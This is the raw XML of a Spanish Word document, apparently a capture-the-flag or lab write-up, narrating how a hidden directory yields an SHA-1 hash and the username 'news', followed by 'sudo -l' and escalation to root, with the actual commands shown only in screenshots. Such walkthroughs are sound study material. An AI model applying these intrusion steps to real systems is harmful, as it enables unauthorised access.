    <w:p w:rsidR="0D837BA9" w:rsidP="02C18489" w:rsidRDefault="0D837BA9" w14:paraId="41737004" w14:textId="50DACC2C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0D837BA9">
        <w:drawing>
          <wp:inline wp14:editId="2CA5F8B8" wp14:anchorId="4D99B77E">
            <wp:extent cx="4572000" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1482460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6245e255a4a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196D5" w:rsidP="02C18489" w:rsidRDefault="17E196D5" w14:paraId="523D37C3" w14:textId="6F7BBD4C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="17E196D5">
        <w:rPr/>
        <w:t>Los otros dos usuarios si nos fijamos no tienen ese tercer directorio de tres puntos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="17E196D5" w:rsidP="02C18489" w:rsidRDefault="17E196D5" w14:paraId="6D8834C3" w14:textId="67C9E8EF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="17E196D5">
        <w:drawing>
          <wp:inline wp14:editId="259DB605" wp14:anchorId="4B37A728">
            <wp:extent cx="4572000" cy="3781425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1949635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602f8ab849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196D5" w:rsidP="02C18489" w:rsidRDefault="17E196D5" w14:paraId="0455F143" w14:textId="0EF0096A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="17E196D5">
        <w:rPr/>
        <w:t>En la ruta de tres puntos nos encontramos un archivo txt:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="17E196D5" w:rsidP="02C18489" w:rsidRDefault="17E196D5" w14:paraId="02ED5D81" w14:textId="2A43284B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="17E196D5">
        <w:drawing>
          <wp:inline wp14:editId="5C9326D3" wp14:anchorId="2F84CD35">
            <wp:extent cx="4286848" cy="1133633"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2133261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c1cc8bfc2145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196D5" w:rsidP="02C18489" w:rsidRDefault="17E196D5" w14:paraId="0A03F6C4" w14:textId="06632EB4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="17E196D5">
        <w:rPr/>
        <w:t xml:space="preserve">Y su contenido es </w:t>
      </w:r>
      <w:r w:rsidR="0AD25790">
        <w:rPr/>
        <w:t>un código cifrado</w:t>
      </w:r>
      <w:r w:rsidR="17E196D5">
        <w:rPr/>
        <w:t xml:space="preserve"> por SHA-1:</w:t>
      </w:r>
      <w:r w:rsidR="78A6F8A7">
        <w:rPr/>
        <w:t xml:space="preserve"> y un nombre news que podria ser el usuario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="17E196D5" w:rsidP="02C18489" w:rsidRDefault="17E196D5" w14:paraId="1F4B2B79" w14:textId="6B57C4F1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="17E196D5">
        <w:drawing>
          <wp:inline wp14:editId="72E4191E" wp14:anchorId="501A89CE">
            <wp:extent cx="4153480" cy="704948"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="143413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b40de26254e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F40BDB" w:rsidP="02C18489" w:rsidRDefault="18F40BDB" w14:paraId="30D04CBB" w14:textId="69AC2316">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="18F40BDB">
        <w:rPr/>
        <w:t>Y nos da como resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="18F40BDB" w:rsidP="02C18489" w:rsidRDefault="18F40BDB" w14:paraId="572EC43B" w14:textId="4CDE2611">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="18F40BDB">
        <w:drawing>
          <wp:inline wp14:editId="4AE7EDCD" wp14:anchorId="553EEB69">
            <wp:extent cx="4572000" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1956520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c41b72673c42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CF603" w:rsidP="02C18489" w:rsidRDefault="7F8CF603" w14:paraId="5F04A8E9" w14:textId="2566FD29">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="7F8CF603">
        <w:rPr/>
        <w:t>Ahora sí, nos autenticamos con el usuario "</w:t>
      </w:r>
      <w:r w:rsidR="7F8CF603">
        <w:rPr/>
        <w:t>news</w:t>
      </w:r>
      <w:r w:rsidR="7F8CF603">
        <w:rPr/>
        <w:t>", ejecutamos "sudo -l":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6209320D" w:rsidP="02C18489" w:rsidRDefault="6209320D" w14:paraId="73A75982" w14:textId="55F78204">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6209320D">
        <w:drawing>
          <wp:inline wp14:editId="28854C35" wp14:anchorId="126A1B7C">
            <wp:extent cx="3858164" cy="733528"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1614231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02653530fa41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9320D" w:rsidP="02C18489" w:rsidRDefault="6209320D" w14:paraId="4C765990" w14:textId="688C55D2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6209320D">
        <w:drawing>
          <wp:inline wp14:editId="3C19746F" wp14:anchorId="22E48497">
            <wp:extent cx="4572000" cy="1114425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1359332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4992235c364a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9320D" w:rsidP="02C18489" w:rsidRDefault="6209320D" w14:paraId="4ED53C35" w14:textId="6F5964D9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="6209320D">
        <w:rPr/>
        <w:t xml:space="preserve">Aprovechamos para escalar privilegios en el sistema como </w:t>
      </w:r>
      <w:r w:rsidR="6209320D">
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="6209320D">
        <w:rPr/>
        <w:t>, para ello ejecutaremos la siguiente sintaxis:</w:t>
      </w:r>
      <w:r w:rsidR="290C2516">
        <w:rPr/>
        <w:t xml:space="preserve"> y ya </w:t>
      </w:r>
      <w:r w:rsidR="290C2516">
        <w:rPr/>
        <w:t>estaríamos</w:t>
      </w:r>
      <w:r w:rsidR="290C2516">
        <w:rPr/>
        <w:t xml:space="preserve"> siendo root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="290C2516" w:rsidP="02C18489" w:rsidRDefault="290C2516" w14:paraId="39F6DD64" w14:textId="601EAA17">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="290C2516">
        <w:drawing>
          <wp:inline wp14:editId="155EEE2E" wp14:anchorId="050CD424">
            <wp:extent cx="4572000" cy="2085975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89714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6873099ee40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C18489" w:rsidP="02C18489" w:rsidRDefault="02C18489" w14:paraId="263C9835" w14:textId="5F1EE3CC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="02C18489" w:rsidP="02C18489" w:rsidRDefault="02C18489" w14:paraId="50F8CD28" w14:textId="78A2EDFC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="02C18489" w:rsidP="02C18489" w:rsidRDefault="02C18489" w14:paraId="6EE5D57C" w14:textId="1DD2DFA2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1434B6"/>
    <w:rsid w:val="0265C15B"/>
    <w:rsid w:val="02C18489"/>
    <w:rsid w:val="043F234C"/>
    <w:rsid w:val="050416C2"/>
    <w:rsid w:val="0718F152"/>
    <w:rsid w:val="07C0F70F"/>
    <w:rsid w:val="081B3A14"/>
    <w:rsid w:val="081F1FF8"/>
    <w:rsid w:val="09DE6321"/>
    <w:rsid w:val="0AAF4AC4"/>
    <w:rsid w:val="0AD25790"/>
    <w:rsid w:val="0AFE6F78"/>
    <w:rsid w:val="0D837BA9"/>
    <w:rsid w:val="0F510E38"/>
    <w:rsid w:val="104F262E"/>
    <w:rsid w:val="17A46DF1"/>
    <w:rsid w:val="17E196D5"/>
    <w:rsid w:val="1859C8D4"/>
    <w:rsid w:val="1867826E"/>
    <w:rsid w:val="18F40BDB"/>
    <w:rsid w:val="1A0B6EFE"/>
    <w:rsid w:val="1B74D20A"/>
    <w:rsid w:val="1FB6FA0B"/>
    <w:rsid w:val="22AAE324"/>
    <w:rsid w:val="2512E0D6"/>
    <w:rsid w:val="254B0EB7"/>
    <w:rsid w:val="26C8AD7A"/>
    <w:rsid w:val="28B94B10"/>
    <w:rsid w:val="290C2516"/>
    <w:rsid w:val="2A10AF63"/>
    <w:rsid w:val="2AC67B3F"/>
    <w:rsid w:val="2B95403F"/>
    <w:rsid w:val="2F5C4968"/>
    <w:rsid w:val="302ADDB0"/>
    <w:rsid w:val="367A43D4"/>
    <w:rsid w:val="38161435"/>
    <w:rsid w:val="3B348C9A"/>
    <w:rsid w:val="3EE930CB"/>
    <w:rsid w:val="3F0DA46D"/>
    <w:rsid w:val="411CE1BD"/>
    <w:rsid w:val="443EB38F"/>
    <w:rsid w:val="45919B8A"/>
    <w:rsid w:val="45DA83F0"/>
    <w:rsid w:val="45EF0D33"/>
    <w:rsid w:val="466787A1"/>
    <w:rsid w:val="496481A7"/>
    <w:rsid w:val="4A393E1B"/>
    <w:rsid w:val="4B05679E"/>
    <w:rsid w:val="4DDA43B8"/>
    <w:rsid w:val="4E0E3621"/>
    <w:rsid w:val="4EEE4ABC"/>
    <w:rsid w:val="4FE28F0F"/>
    <w:rsid w:val="4FE61A41"/>
    <w:rsid w:val="501434B6"/>
    <w:rsid w:val="53F7BFBF"/>
    <w:rsid w:val="5487C928"/>
    <w:rsid w:val="54D00E83"/>
    <w:rsid w:val="55EC08A0"/>
    <w:rsid w:val="58D4198C"/>
    <w:rsid w:val="5AF171BC"/>
    <w:rsid w:val="5C1EEE5E"/>
    <w:rsid w:val="5EE19E84"/>
    <w:rsid w:val="5EF98899"/>
    <w:rsid w:val="60BD1A6A"/>
    <w:rsid w:val="60BE3EC2"/>
    <w:rsid w:val="60C4818B"/>
    <w:rsid w:val="612FF5CA"/>
    <w:rsid w:val="61EC326C"/>
    <w:rsid w:val="6209320D"/>
    <w:rsid w:val="6ABDAFB3"/>
    <w:rsid w:val="6C160016"/>
    <w:rsid w:val="70BB3A2F"/>
    <w:rsid w:val="70E97139"/>
    <w:rsid w:val="7285419A"/>
    <w:rsid w:val="734F4ADF"/>
    <w:rsid w:val="73FB50F3"/>
    <w:rsid w:val="743EF51D"/>
    <w:rsid w:val="75B78587"/>
    <w:rsid w:val="77CBD61E"/>
    <w:rsid w:val="78A6F8A7"/>
    <w:rsid w:val="79D03571"/>
    <w:rsid w:val="7B8F5CFC"/>
    <w:rsid w:val="7DCCAF06"/>
    <w:rsid w:val="7F8CF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434B6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4F954EE3-6A3A-4564-9BC2-DE937830815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26cc36913bd4539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="R02b32f4f70394c2c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R5b1de605e3554e4c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="Rd7850d4712a24b5f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R783049869c7f4780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="R1e2a232287844dd2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="R6e86d0b645534275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="R05bbf241fb1b43fe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="R3df50200be7f4fe1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="R0e1ed5f1cf5340dd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="R580c367d534a4ba6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="R64ba90d31ede4d83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="Rfafc59dbf8cb4818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="Rc3867c1c9cee4401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="R6c90b49a0a224986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="Rf5cd0fa9c46e4b56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="R673c5a5af59c4892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="R3d7b0cba2ee3412e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="R2554f782f606450d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image14.png" Id="Rf4878918fd934814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="Re1fb9391d48344fa" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="Rd696245e255a4ae2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="Re9602f8ab8494bdf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="Reec1cc8bfc214591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="R221b40de26254ea1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1a.png" Id="R13c41b72673c42fb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1b.png" Id="R2f02653530fa4168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1c.png" Id="R864992235c364a4a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1d.png" Id="R7366873099ee404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2024-02-24T23:01:47.1637305Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-25T01:34:24.3544887Z</dcterms:modified>
  <dc:creator>Ana Baena Fernández</dc:creator>
  <lastModifiedBy>Ana Baena Fernández</lastModifiedBy>
</coreProperties>
</file>